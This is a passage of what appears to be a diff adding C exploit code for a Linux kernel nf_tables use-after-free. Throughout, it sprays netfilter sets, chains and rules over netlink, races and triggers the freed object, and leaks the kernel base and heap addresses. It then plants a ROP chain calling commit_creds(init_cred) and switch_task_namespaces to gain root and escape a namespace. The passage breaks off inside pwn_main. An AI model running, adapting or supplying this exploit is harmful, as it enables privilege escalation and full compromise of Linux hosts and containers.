pwn_table); + nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); + nftnl_set_set_u32(set, NFTNL_SET_ID, set_id); + nftnl_set_set_u32(set, NFTNL_SET_FLAGS, set_flags); + nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, set_key_len); + if (set_desc_size != 0) { + nftnl_set_set_u32(set, NFTNL_SET_DESC_SIZE, set_desc_size); + } + if (set_userdata != NULL) { + nftnl_set_set_data(set, NFTNL_SET_USERDATA, set_userdata, set_userdata_len); + } + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); +} + + +static void pwn_create_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name) +{ + struct nftnl_chain *chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, pwn_family); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, pwn_table); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWCHAIN, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_chain_free(chain); +} + + +static void pwn_create_lookup_set_elem(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *set_name, + void *set_elem_key, uint32_t set_elem_key_len) +{ + char set_elem_userdata[0x2f] = {}; + + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, pwn_family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, pwn_table); + nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); + + struct nftnl_set_elem *set_elem = nftnl_set_elem_alloc(); + if (set_elem == NULL) { + errx(1, "Cannot into nftnl_set_elem_alloc()"); + } + + nftnl_set_elem_set(set_elem, NFTNL_SET_ELEM_KEY, set_elem_key, set_elem_key_len); + nftnl_set_elem_set(set_elem, NFTNL_SET_ELEM_USERDATA, set_elem_userdata, sizeof(set_elem_userdata)); + + nftnl_set_elem_add(set, set_elem); + + struct nlmsghdr *nlh = nftnl_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSETELEM, + NFPROTO_INET, + NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK, + seq + ); + nftnl_set_elems_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); +} + + +static void pwn_create_lookup_rule(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name, char *set_name) +{ + struct nftnl_rule *rule = nftnl_rule_alloc(); + if (rule == NULL) { + errx(1, "Cannot into nftnl_rule_alloc()"); + } + + nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, pwn_family); + nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, pwn_table); + nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name); + + struct nftnl_expr *lookup = nftnl_expr_alloc("lookup"); + if (lookup == NULL) { + errx(1, "Cannot into nftnl_expr_alloc()"); + } + + nftnl_expr_set_u32(lookup, NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1); + nftnl_expr_set_str(lookup, NFTNL_EXPR_LOOKUP_SET, set_name); + nftnl_expr_set_u32(lookup, NFTNL_EXPR_LOOKUP_FLAGS, 0); + + nftnl_rule_add_expr(rule, lookup); + + struct nlmsghdr *nlh = nftnl_rule_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWRULE, + pwn_family, + NLM_F_APPEND | NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_rule_nlmsg_build_payload(nlh, rule); + mnl_nlmsg_batch_next(batch); + + nftnl_rule_free(rule); +} + +static void pwn_create_leak_rule(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name) +{ + char rule_userdata[0xa0] = {'a',}; + + struct nftnl_rule *rule = nftnl_rule_alloc(); + if (rule == NULL) { + errx(1, "Cannot into nftnl_rule_alloc()"); + } + + nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, pwn_family); + nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, pwn_table); + nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name); + nftnl_rule_set_data(rule, NFTNL_RULE_USERDATA, rule_userdata, sizeof(rule_userdata)); + + struct nftnl_expr *expr = nftnl_expr_alloc("counter"); + if (expr == NULL) { + errx(1, "Cannot into nftnl_expr_alloc()"); + } + + nftnl_rule_add_expr(rule, expr); + + struct nlmsghdr *nlh = nftnl_rule_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWRULE, + pwn_family, + NLM_F_APPEND | NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_rule_nlmsg_build_payload(nlh, rule); + mnl_nlmsg_batch_next(batch); + + nftnl_rule_free(rule); +} + +static void pwn_create_leak_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name) +{ + struct nftnl_chain *chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + char data[0x200] = {0,}; + + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, pwn_family); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, pwn_table); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_data(chain, NFTNL_CHAIN_USERDATA, data, 0xf0); + + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWCHAIN, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_chain_free(chain); +} + +struct list_head { + struct list_head *next, *prev; +}; + +struct fake_nft_rule { + struct list_head list; + uint64_t handle:42, + genmask:2, + dlen:12, + udata:1; +}; + +void make_payload_rop(uint64_t* data){ + int i = 0; + + data[i++] = kbase + POP_RSI_RET; + data[i++] = 0; + + data[i++] = kbase + POP_RSI_RET; + data[i++] = 0; + + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + PUSH_RAX_POP_RSP; // expr->ops->deactivate() + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + data[i++] = kbase + VFORK; + data[i++] = kbase + DELAY; +} + +static void pwn_create_rop_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name) +{ + struct nftnl_chain *chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + uint64_t data[0x100] = {0,}; + make_payload_rop(data); + + data[5] = kbase + PUSH_RAX_POP_RSP; + + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, pwn_family); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, pwn_table); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_data(chain, NFTNL_CHAIN_USERDATA, data, 0xf0); + + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWCHAIN, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_chain_free(chain); +} + +static void pwn_create_fake_rule_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name) +{ + struct nftnl_chain *chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + char data[0x200] = {0,}; + + memset(data, 'c', 0x100); + + struct fake_nft_rule * payload = (struct fake_nft_rule *) data; + + payload->dlen = 8; + payload->genmask = 0; + payload->handle = 0xffff; + payload->list.prev = (void*) 0; + payload->list.next = (void*) 0; + + *((uint64_t*)data + (sizeof(struct fake_nft_rule) / sizeof(uint64_t*))) = heap_addr; + + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, pwn_family); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, pwn_table); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_data(chain, NFTNL_CHAIN_USERDATA, data, 0xf0); + + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWCHAIN, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_chain_free(chain); +} + +static void pwn_prepare(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_prepare\n"); + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + pwn_create_table(batch, seq++); + + pwn_create_chain(batch, seq++, pwn_lookup_chain); + + pwn_create_chain(batch, seq++, pwn_log_chain); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_spray(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_spray\n"); + + memset(uaf_set_key, 0, sizeof(uaf_set_key)); + uaf_set_key[4] = 0x90; + + char set_userdata_buf[0x100] = {}; + + char *set_userdata; + uint32_t set_userdata_size; + if (cfg_race_set_slab == 0) { + set_userdata = NULL; + set_userdata_size = 0; + } + else { + set_userdata = set_userdata_buf; + set_userdata_size = sizeof(set_userdata_buf); + } + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + for (int spray = - 0x50; spray < 10; ++ spray) { + if (spray == 0) { + pwn_create_set(batch, seq++, pwn_lookup_set, spray, NFT_SET_ANONYMOUS, sizeof(uaf_set_key), 0, set_userdata, set_userdata_size); + } + else { + char *set_name; + asprintf(&set_name, "spray_set_%04hx", spray); + pwn_create_set(batch, seq++, set_name, spray, NFT_SET_ANONYMOUS, sizeof(uaf_set_key), 0, set_userdata, set_userdata_size); + } + } + + for (int spray = - 0x60; spray < 0x21; ++ spray) { + if (spray == 0) { + pwn_create_lookup_set_elem(batch, seq++, pwn_lookup_set, uaf_set_key, sizeof(uaf_set_key)); + } + else { + } + } + + pwn_create_lookup_rule(batch, seq++, pwn_lookup_chain, pwn_lookup_set); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_delay_spray_set(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_delay_spray_set\n"); + + seq = time(NULL); + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + pwn_create_set(batch, seq++, "set_delay", 1, 0, sizeof(uint64_t), 0, NULL, 0); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_delay_spray_set_elem(struct mnl_socket *nl, uint64_t *set_elem_key, uint64_t set_elem_key_end) +{ + uint32_t portid, seq, table_seq; + int ret; + + seq = time(NULL); + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, pwn_family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, pwn_table); + nftnl_set_set_str(set, NFTNL_SET_NAME, "set_delay"); + + uint64_t count = set_elem_key_end - (*set_elem_key); + if (count > 0x800) { + count = 0x800; + } + while (count > 0) { + -- count; + + struct nftnl_set_elem *set_elem = nftnl_set_elem_alloc(); + if (set_elem == NULL) { + errx(1, "Cannot into nftnl_set_elem_alloc()"); + } + + nftnl_set_elem_set(set_elem, NFTNL_SET_ELEM_KEY, set_elem_key, sizeof(*set_elem_key)); + + nftnl_set_elem_add(set, set_elem); + + ++ (*set_elem_key); + } + + struct nlmsghdr *nlh = nftnl_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSETELEM, + NFPROTO_INET, + NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK, + seq++ + ); + nftnl_set_elems_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_trigger(struct mnl_socket *nl) +{ + struct mnl_nlmsg_batch *batch; + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_trigger\n"); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + append_del_rule(batch, seq++, NFPROTO_INET, "testfirewall", pwn_lookup_chain, -1); + + for (int spray = 2; spray < 10; spray += 2) { + char *set_name; + asprintf(&set_name, "spray_set_%04hx", spray); + append_del_set(batch, seq++, NFPROTO_INET, "testfirewall", set_name); + } + + append_del_set(batch, seq++, NFPROTO_INET, "testfirewall", "set_delay"); + + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, pwn_family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, pwn_table); + nftnl_set_set_str(set, NFTNL_SET_NAME, pwn_lookup_set); + + struct nlmsghdr *nlh = nftnl_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELSET, + NFPROTO_INET, + NLM_F_ACK, + seq++ + ); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_race(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_race\n"); + + uint32_t set_desc_size; + if (cfg_race_set_slab == 0) { + set_desc_size = 0x0c; + } + else { + set_desc_size = 0x10; + } + + seq = time(NULL); + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + for (int spray = 0; spray != 0x20; ++ spray) { + char *set_name; + asprintf(&set_name, "race_set_%0200hx", spray); + pwn_create_set(batch, seq++, set_name, spray, NFT_SET_ANONYMOUS, sizeof(uaf_set_key), set_desc_size, 0, 0); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_spray_chain(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_spray_chain\n"); + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + for(int i = 0 ; i < 0x20; i++){ + char *chain_name; + asprintf(&chain_name, "spray_chain_%08hx", i); + pwn_create_leak_chain(batch, seq++, chain_name); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_spray_chain_rop(struct mnl_socket *nl) +{ + uint32_t seq; + + printf("pwn_uaf_spray_chain_rop\n"); + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + for(int i = 0x100; i < 0x180; i++){ + char *chain_name; + asprintf(&chain_name, "spray_chain_%08hx", i); + pwn_create_rop_chain(batch, seq++, chain_name); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); +} + +static void pwn_uaf_spray_chain_fake_rule(struct mnl_socket *nl) +{ + uint32_t seq; + + printf("pwn_uaf_spray_chain_fake_rule\n"); + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + for(int i = 0x200; i < 0x300; i++){ + char *chain_name; + asprintf(&chain_name, "spray_chain_fake_rule_%08hx", i); + pwn_create_fake_rule_chain(batch, seq++, chain_name); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); +} + +static void pwn_uaf_del_rule(struct mnl_socket *nl, uint64_t handle) +{ + struct mnl_nlmsg_batch *batch; + uint32_t seq; + + printf("pwn_uaf_del_rule\n"); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if(handle == -1){ + for(int i = victim_rule_handle-2; i < victim_rule_handle; i++) + append_del_rule(batch, seq++, NFPROTO_INET, "testfirewall", pwn_log_chain, i); + } + else + append_del_rule(batch, seq++, NFPROTO_INET, "testfirewall", pwn_log_chain, handle); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); +} + +static void pwn_uaf_del_set(struct mnl_socket *nl) +{ + struct mnl_nlmsg_batch *batch; + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_del_set\n"); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + for(uint64_t i = 0x60; i < 0x71; i++){ + append_del_set_handle(batch, seq++, NFPROTO_INET, "testfirewall", i); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_del_chain(struct mnl_socket *nl) +{ + struct mnl_nlmsg_batch *batch; + uint32_t seq; + + printf("pwn_uaf_del_chain\n"); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + for(int i = 0; i < 0x20; i++){ + char *chain_name; + asprintf(&chain_name, "spray_chain_%08hx", i); + append_del_chain(batch, seq++, NFPROTO_INET, "testfirewall", chain_name); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); +} + +static void pwn_read_dump_chain(struct mnl_socket *nl) +{ + uint32_t seq; + + printf("pwn_read_dump_chain\n"); + + struct nftnl_chain *chain = NULL; + + for(int i = 0; i < 0x20; i++){ + chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + seq = time(NULL); + struct nlmsghdr *nlh = nftnl_nlmsg_build_hdr( + mnl_batch_buffer, + NFT_MSG_GETCHAIN, + NFPROTO_INET, + NLM_F_ACK, + seq + ); + + char *chain_name; + asprintf(&chain_name, "spray_chain_%08hx", i); + + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, "testfirewall"); + nftnl_chain_nlmsg_build_payload(nlh, chain); + nftnl_chain_free(chain); + + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + memset(mnl_batch_buffer, 0, sizeof(mnl_batch_buffer)); + + mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + + nft_counter_ops = *(unsigned long*) &mnl_batch_buffer[0x74]; + kbase = nft_counter_ops - NFT_COUNTER_OPS; + heap_addr = *(unsigned long*) &mnl_batch_buffer[0x64]; + victim_rule_handle = *(unsigned long*) &mnl_batch_buffer[0x6c] & 0xffff; + + if(nft_counter_ops != 0){ + hex_dump(mnl_batch_buffer, 0x80); + printf("[*] nft_counter_ops %lx kbase %lx heap_addr %lx handle %lx\n", + nft_counter_ops, kbase, heap_addr, victim_rule_handle); + break; + } + mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + } +} + +static void pwn_uaf_spray_rule(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_spray_rule\n"); + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + for(int i = 0 ; i < 0x20; i++) + pwn_create_leak_rule(batch, seq++, pwn_log_chain); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static int pwn_main() +{ + struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) { + err(1, "Cannot into mnl_socket_open()"); + } + + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + err(1, "Cannot into mnl_socket_bind()"); + } + + pwn_prepare(nl); + + usleep(cfg_initial_usleep); + + pwn_uaf_spray(nl); + + pwn_delay_spray_set(nl); + + uint64_t race_set_elem_key = 0; + while (race_set_elem_key < cfg_race_set_elem_count) { + pwn_delay_spray_set_elem(nl, 